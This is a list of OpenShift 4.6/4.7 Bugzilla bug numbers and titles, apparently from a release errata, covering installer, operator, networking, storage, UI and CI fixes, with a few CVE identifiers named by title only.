1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface
1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster
1887525 - Failures to set master HardwareDetails cannot easily be debugged
1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable
1887585 - ovn-masters stuck in crashloop after scale test
1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade.
1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator
1887740 - cannot install descheduler operator after uninstalling it
1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events
1887750 - `oc explain localvolumediscovery` returns empty description
1887751 - `oc explain localvolumediscoveryresult` returns empty description
1887778 - Add ContainerRuntimeConfig gatherer
1887783 - PVC upload cannot continue after approve the certificate
1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard
1887799 - User workload monitoring prometheus-config-reloader OOM
1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky
1887863 - Installer panics on invalid flavor
1887864 - Clean up dependencies to avoid invalid scan flagging
1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison
1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig
1888015 - workaround kubelet graceful termination of static pods bug
1888028 - prevent extra cycle in aggregated apiservers
1888036 - Operator details shows old CRD versions
1888041 - non-terminating pods are going from running to pending
1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect
1888073 - Operator controller continuously busy looping
1888118 - Memory requests not specified for image registry operator
1888150 - Install Operand Form on OperatorHub is displaying unformatted text
1888172 - PR 209 didn't update the sample archive, but machineset and pdbs are now namespaced
1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build
1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5
1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt
1888363 - namespaces crash in dev
1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created
1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected
1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC
1888494 - imagepruner pod is error when image registry storage is not configured
1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree"
1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error
1888601 - The poddisruptionbudgets is using the operator service account, instead of gather
1888657 - oc doesn't know its name
1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable
1888671 - Document the Cloud Provider's ignore-volume-az setting
1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image
1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName()
1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set
1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster
1888866 - AggregatedAPIDown permanently firing after removing APIService
1888870 - JS error when using autocomplete in YAML editor
1888874 - hover message are not shown for some properties
1888900 - align plugins versions
1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation
1889213 - The error message of uploading failure is not clear enough
1889267 - Increase the time out for creating template and upload image in the terraform
1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)
1889374 - Kiali feature won't work on fresh 4.6 cluster
1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode
1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade
1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information
1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance
1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown
1889577 - Resources are not shown on project workloads page
1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment
1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages
1889692 - Selected Capacity is showing wrong size
1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15
1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off
1889710 - Prometheus metrics on disk take more space compared to OCP 4.5
1889721 - opm index add semver-skippatch mode does not respect prerelease versions
1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab
1889767 - [vsphere] Remove certificate from upi-installer image
1889779 - error when destroying a vSphere installation that failed early
1889787 - OCP is flooding the oVirt engine with auth errors
1889838 - race in Operator update after fix from bz1888073
1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1
1889863 - Router prints incorrect log message for namespace label selector
1889891 - Backport timecache LRU fix
1889912 - Drains can cause high CPU usage
1889921 - Reported Degraded=False Available=False pair does not make sense
1889928 - [e2e][automation] Add more tests for golden os
1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName
1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings
1890074 - MCO extension kernel-headers is invalid
1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest
1890130 - multitenant mode consistently fails CI
1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e
1890145 - The mismatched of font size for Status Ready and Health Check secondary text
1890180 - FieldDependency x-descriptor doesn't support non-sibling fields
1890182 - DaemonSet with existing owner garbage collected
1890228 - AWS: destroy stuck on route53 hosted zone not found
1890235 - e2e: update Protractor's checkErrors logging
1890250 - workers may fail to join the cluster during an update from 4.5
1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member
1890270 - External IP doesn't work if the IP address is not assigned to a node
1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability
1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere
1890467 - unable to edit an application without a service
1890472 - [Kuryr] Bulk port creation exception not completely formatted
1890494 - Error assigning Egress IP on GCP
1890530 - cluster-policy-controller doesn't gracefully terminate
1890630 - [Kuryr] Available port count not correctly calculated for alerts
1890671 - [SA] verify-image-signature using service account does not work
1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest
1890808 - New etcd alerts need to be added to the monitoring stack
1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha.
1890984 - Rename operator-webhook-config to sriov-operator-webhook-config
1890995 - wew-app should provide more insight into why image deployment failed
1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call
1891047 - Helm chart fails to install using developer console because of TLS certificate error
1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler
1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI
1891108 - p&f: Increase the concurrency share of workload-low priority level
1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)
1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown
1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart)
1891362 - Wrong metrics count for openshift_build_result_total
1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message
1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message
1891376 - Extra text in Cluster Utilization charts
1891419 - Wrong detail head on network policy detail page.
1891459 - Snapshot tests should report stderr of failed commands
1891498 - Other machine config pools do not show during update
1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage
1891551 - Clusterautoscaler doesn't scale up as expected
1891552 - Handle missing labels as empty.
1891555 - The windows oc.exe binary does not have version metadata
1891559 - kuryr-cni cannot start new thread
1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11
1891625 - [Release 4.7] Mutable LoadBalancer Scope
1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml
1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails
1891740 - OperatorStatusChanged is noisy
1891758 - the authentication operator may spam DeploymentUpdated event endlessly
1891759 - Dockerfile builds cannot change /etc/pki/ca-trust
1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1
1891825 - Error message not very informative in case of mode mismatch
1891898 - The ClusterServiceVersion can define Webhooks that cannot be created.
1891951 - UI should show warning while creating pools with compression on
1891952 - [Release 4.7] Apps Domain Enhancement
1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace
1891995 - OperatorHub displaying old content
1891999 - Storage efficiency card showing wrong compression ratio
1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28' not found (required by ./opm)
1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector.
1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator'
1892288 - assisted install workflow creates excessive control-plane disruption
1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config
1892358 - [e2e][automation] update feature gate for kubevirt-gating job
1892376 - Deleted netnamespace could not be re-created
1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky
1892393 - TestListPackages is flaky
1892448 - MCDPivotError alert/metric missing
1892457 - NTO-shipped stalld needs to use FIFO for boosting.
1892467 - linuxptp-daemon crash
1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env
1892653 - User is unable to create KafkaSource with v1beta
1892724 - VFS added to the list of devices of the nodeptpdevice CRD
1892799 - Mounting additionalTrustBundle in the operator
1893117 - Maintenance mode on vSphere blocks installation.
1893351 - TLS secrets are not able to edit on console.
1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots
1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability
1893546 - Deploy using virtual media fails on node cleaning step
1893601 - overview filesystem utilization of OCP is showing the wrong values
1893645 - oc describe route SIGSEGV
1893648 - Ironic image building process is not compatible with UEFI secure boot
1893724 - OperatorHub generates incorrect RBAC
1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted
1893776 - No useful metrics for image pull time available, making debugging issues there impossible
1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator
1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD
1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS
1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped
1893944 - Wrong product name for Multicloud Object Gateway
1893953 - (release-4.7) Gather default StatefulSet configs
1893956 - Installation always fails at "failed to initialize the cluster: Cluster operator image-registry is still updating"
1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser
1893972 - Should skip e2e test cases as early as possible
1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://'
1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective
1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set
1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used.
1894065 - tag new packages to enable TLS support
1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0
1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries
1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM
1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted
1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)
1894216 - Improve OpenShift Web Console availability
1894275 - Fix CRO owners file to reflect node owner
1894278 - "database is locked" error when adding bundle to index image
1894330 - upgrade channels needs to be updated for 4.7
1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient"
1894374 - Dont prevent the user from uploading a file with incorrect extension
1894432 - [oVirt] sometimes installer timeout on tmp_import_vm
1894477 - bash syntax error in nodeip-configuration.service
1894503 - add automated test for Polarion CNV-5045
1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform
1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets
1894645 - Cinder volume provisioning crashes on nil cloud provider
1894677 - image-pruner job is panicking: klog stack
1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0
1894860 - 'backend' CI job passing despite failing tests
1894910 - Update the node to use the real-time kernel fails
1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package
1895065 - Schema / Samples / Snippets Tabs are all selected at the same time
1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI
1895141 - panic in service-ca injector
1895147 - Remove memory limits on openshift-dns
1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation
1895268 - The bundleAPIs should NOT be empty
1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster
1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release"
1895360 - Machine Config Daemon removes a file although its defined in the dropin
1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1
1895372 - Web console going blank after selecting any operator to install from OperatorHub
1895385 - Revert KUBELET_LOG_LEVEL back to level 3
1895423 - unable to edit an application with a custom builder image
1895430 - unable to edit custom template application
1895509 - Backup taken on one master cannot be restored on other masters
1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image
1895838 - oc explain description contains '/'
1895908 - "virtio" option is not available when modifying a CD-ROM to disk type
1895909 - e2e-metal-ipi-ovn-dualstack is failing
1895919 - NTO fails to load kernel modules
1895959 - configuring webhook token authentication should prevent cluster upgrades
1895979 - Unable to get coreos-installer with --copy-network to work
1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV
1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)
1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed
1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest
1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded
1896244 - Found a panic in storage e2e test
1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general
1896302 - [e2e][automation] Fix 4.6 test failures
1896365 - [Migration]The SDN migration cannot revert under some conditions
1896384 - [ovirt IPI]: local coredns resolution not working
1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6
1896529 - Incorrect instructions in the Serverless operator and application quick starts
1896645 - documentationBaseURL needs to be updated for 4.7
1896697 - [Descheduler] policy.yaml param in cluster configmap is empty
1896704 - Machine API components should honour cluster wide proxy settings
1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters
1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator
1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails
1896918 - start creating new-style Secrets for AWS
1896923 - DNS pod /metrics exposed on anonymous http port
1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1897003 - VNC console cannot be connected after visit it in new window
1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals
1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO
1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored
1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV.
1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces
1897138 - oVirt provider uses depricated cluster-api project
1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly
1897252 - Firing alerts are not showing up in console UI after cluster is up for some time
1897354 - Operator installation showing success, but Provided APIs are missing
1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused"
1897412 - [sriov]disableDrain did not be updated in CRD of manifest
1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page
1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost'
1897520 - After restarting nodes the image-registry co is in degraded true state.
1897584 - Add casc plugins
1897603 - Cinder volume attachment detection failure in Kubelet
1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized"
1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests
1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition
1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`
1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing
1897897 - ptp lose sync openshift 4.6
1898036 - no network after reboot (IPI)
1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically
1898097 - mDNS floods the baremetal network
1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem
1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied
1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster
1898174 - [OVN] EgressIP does not guard against node IP assignment
1898194 - GCP: can't install on custom machine types
1898238 - Installer validations allow same floating IP for API and Ingress
1898268 - [OVN]: `make check` broken on 4.6
1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default
1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover
1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display.
1898407 - [Deployment timing regression] Deployment takes longer with 4.7
1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service
1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine
1898500 - Failure to upgrade operator when a Service is included in a Bundle
1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic
1898532 - Display names defined in specDescriptors not respected
1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted
1898613 - Whereabouts should exclude IPv6 ranges
1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase
1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk
1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability
1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator
1898839 - Wrong YAML in operator metadata
1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job
1898873 - Remove TechPreview Badge from Monitoring
1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way
1899111 - [RFE] Update jenkins-maven-agen to maven36
1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist
1899175 - bump the RHCOS boot images for 4.7
1899198 - Use new packages for ipa ramdisks
1899200 - In Installed Operators page I cannot search for an Operator by it's name
1899220 - Support AWS IMDSv2
1899350 - configure-ovs.sh doesn't configure bonding options
1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found"
1899459 - Failed to start monitoring pods once the operator removed from override list of CVO
1899515 - Passthrough credentials are not immediately re-distributed on update
1899575 - update discovery burst to reflect lots of CRDs on openshift clusters
1899582 - update discovery burst to reflect lots of CRDs on openshift clusters
1899588 - Operator objects are re-created after all other associated resources have been deleted
1899600 - Increased etcd fsync latency as of OCP 4.6
1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup
1899627 - Project dashboard Active status using small icon
1899725 - Pods table does not wrap well with quick start sidebar open
1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)
1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality
1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0"
1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap
1899853 - additionalSecurityGroupIDs not working for master nodes
1899922 - NP changes sometimes influence new pods.
1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet
1900008 - Fix internationalized sentence fragments in ImageSearch.tsx
1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx
1900020 - Remove ' from internationalized keys
1900022 - Search Page - Top labels field is not applied to selected Pipeline resources
1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently
1900126 - Creating a VM results in suggestion to create a default storage class when one already exists
1900138 - [OCP on RHV] Remove insecure mode from the installer
1900196 - stalld is not restarted after crash
1900239 - Skip "subPath should be able to unmount" NFS test
1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists
1900377 - [e2e][automation] create new css selector for active users
1900496 - (release-4.7) Collect spec config for clusteroperator resources
1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks
1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue
1900759 - include qemu-guest-agent by default
1900790 - Track all resource counts via telemetry
1900835 - Multus errors when cachefile is not found
1900935 - `oc adm release mirror` panic panic: runtime error
1900989 - accessing the route cannot wake up the idled resources
1901040 - When scaling down the status of the node is stuck on deleting
1901057 - authentication operator health check failed when installing a cluster behind proxy
1901107 - pod donut shows incorrect information
1901111 - Installer dependencies are broken
1901200 - linuxptp-daemon crash when enable debug log level
1901301 - CBO should handle platform=BM without provisioning CR
1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly
1901363 - High Podready Latency due to timed out waiting for annotations
1901373 - redundant bracket on snapshot restore button
1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true"
1901395 - "Edit virtual machine template" action link should be removed
1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting
1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP
1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema
1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance"
1901604 - CNO blocks editing Kuryr options
1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled
1901909 - The device plugin pods / cni pod are restarted every 5 minutes
1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service
1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error
1902059 - Wire a real signer for service accout issuer
1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod
1902253 - MHC status doesnt set RemediationsAllowed = 0
1902299 - Failed to mirror operator catalog - error: destination registry required
1902545 - Cinder csi driver node pod should add nodeSelector for Linux
1902546 - Cinder csi driver node pod doesn't run on master node
1902547 - Cinder csi driver controller pod doesn't run on master node
1902552 - Cinder csi driver does not use the downstream images
1902595 - Project workloads list view doesn't show alert icon and hover message
1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent
1902601 - Cinder csi driver pods run as BestEffort qosClass
1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group
1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails
1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked
1902824 - failed to generate semver informed package manifest: unable to determine default channel
1902894 - hybrid-overlay-node crashing trying to get node object during initialization
1902969 - Cannot load vmi detail page
1902981 - It should default to current namespace when create vm from template
1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI
1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry
1903034 - OLM continuously printing debug logs
1903062 - [Cinder csi driver] Deployment mounted volume have no write access
1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready
1903107 - Enable vsphere-problem-detector e2e tests
1903164 - OpenShift YAML editor jumps to top every few seconds
1903165 - Improve Canary Status Condition handling for e2e tests
1903172 - Column Management: Fix sticky footer on scroll
1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled
1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format:
1903192 - Role name missing on create role binding form
1903196 - Popover positioning is misaligned for Overview Dashboard status items
1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends.
1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components
1903248 - Backport Upstream Static Pod UID patch
1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]
1903290 - Kubelet repeatedly log the same log line from exited containers
1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption.
1903382 - Panic when task-graph is canceled with a TaskNode with no tasks
1903400 - Migrate a VM which is not running goes to pending state
1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page
1903414 - NodePort is not working when configuring an egress IP address
1903424 - mapi_machine_phase_transition_seconds_sum doesn't work
1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum"
1903639 - Hostsubnet gatherer produces wrong output
1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service
1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started
1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image
1903717 - Handle different Pod selectors for metal3 Deployment
1903733 - Scale up followed by scale down can delete all running workers
1903917 - Failed to load "Developer Catalog" page
1903999 - Httplog response code is always zero
1904026 - The quota controllers should resync on new resources and make progress
1904064 - Automated cleaning is disabled by default
1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases
1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap
1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails
1904133 - KubeletConfig flooded with failure conditions
1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart
1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !
1904244 - MissingKey errors for two plugins using i18next.t
1904262 - clusterresourceoverride-operator has version: 1.0.0 every build
1904296 - VPA-operator has version: 1.0.0 every build
1904297 - The index image generated by "opm index prune" leaves unrelated images
1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards
1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade
1904497 - vsphere-problem-detector: Run on vSphere cloud only
1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set
1904502 - vsphere-problem-detector: allow longer timeouts for some operations
1904503 - vsphere-problem-detector: emit alerts
1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)
1904578 - metric scraping for vsphere problem detector is not configured
1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade
1904663 - IPI pointer customization MachineConfig always generated
1904679 - [Feature:ImageInfo] Image info should display information about images
1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image
1904684 - [sig-cli] oc debug ensure it works with image streams
1904713 - Helm charts with kubeVersion restriction are filtered incorrectly
1904776 - Snapshot modal alert is not pluralized
1904824 - Set vSphere hostname from guestinfo before NM starts
1904941 - Insights status is always showing a loading icon
1904973 - KeyError: 'nodeName' on NP deletion
1904985 - Prometheus and thanos sidecar targets are down
1904993 - Many ampersand special characters are found in strings
1905066 - QE - Monitoring test cases - smoke test suite automation
1905074 - QE -Gherkin linter to maintain standards
1905100 - Too many haproxy processes in default-router pod causing high load average
1905104 - Snapshot modal disk items missing keys
1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm
1905119 - Race in AWS EBS determining whether custom CA bundle is used
1905128 - [e2e][automation] e2e tests succeed without actually execute
1905133 - operator conditions special-resource-operator
1905141 - vsphere-problem-detector: report metrics through telemetry
1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures
1905194 - Detecting broken connections to the Kube API takes up to 15 minutes
1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests
1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP
1905253 - Inaccurate text at bottom of Events page
1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905299 - OLM fails to update operator
1905307 - Provisioning CR is missing from must-gather
1905319 - cluster-samples-operator containers are not requesting required memory resource
1905320 - csi-snapshot-webhook is not requesting required memory resource
1905323 - dns-operator is not requesting required memory resource
1905324 - ingress-operator is not requesting required memory resource
1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory
1905328 - Changing the bound token service account issuer invalids previously issued bound tokens
1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory
1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails
1905347 - QE - Design Gherkin Scenarios
1905348 - QE - Design Gherkin Scenarios
1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod
